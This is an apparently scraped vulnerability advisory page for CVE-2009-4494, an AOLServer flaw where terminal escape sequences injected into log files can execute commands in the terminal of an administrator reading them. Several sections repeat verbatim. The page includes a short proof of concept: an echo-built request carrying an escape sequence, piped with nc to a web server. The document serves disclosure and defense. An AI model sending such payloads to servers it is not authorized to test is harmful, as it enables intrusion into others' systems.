AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
BID:37712
Info
AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
| Bugtraq ID: | 37712 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4494 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2010 12:00AM |
| Updated: | Jan 11 2010 12:00AM |
| Credit: | Giovanni 'evilaliv3' Pellerano, Alessandro 'jekil' Tanasi, and Francesco 'ascii' Ongaro |
| Vulnerable: |
AOL AOLserver 4.5.1 AOL AOLserver 4.0 .beta1 AOL AOLserver 3.4.2 Win32 AOL AOLserver 3.4.2 AOL AOLserver 3.4 Win32 AOL AOLserver 3.4 AOL AOLserver 3.3.1 AOL AOLserver 3.3 Win32 AOL AOLserver 3.2 Win32 AOL AOLserver 3.2 UNIX AOL AOLserver 3.0 |
| Not Vulnerable: | |
Discussion
AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
AOLServer 4.5.1 is vulnerable; other versions may also be affected.
AOLServer is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
AOLServer 4.5.1 is vulnerable; other versions may also be affected.
Exploit / POC
AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
Attackers can exploit this issue with readily available tools.
The following example is available:
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc www.example.com 80 < payload
Attackers can exploit this issue with readily available tools.
The following example is available:
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc www.example.com 80 < payload
Solution / Fix
AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
AOLServer Terminal Escape Sequence in Logs Command Injection Vulnerability
References:
References: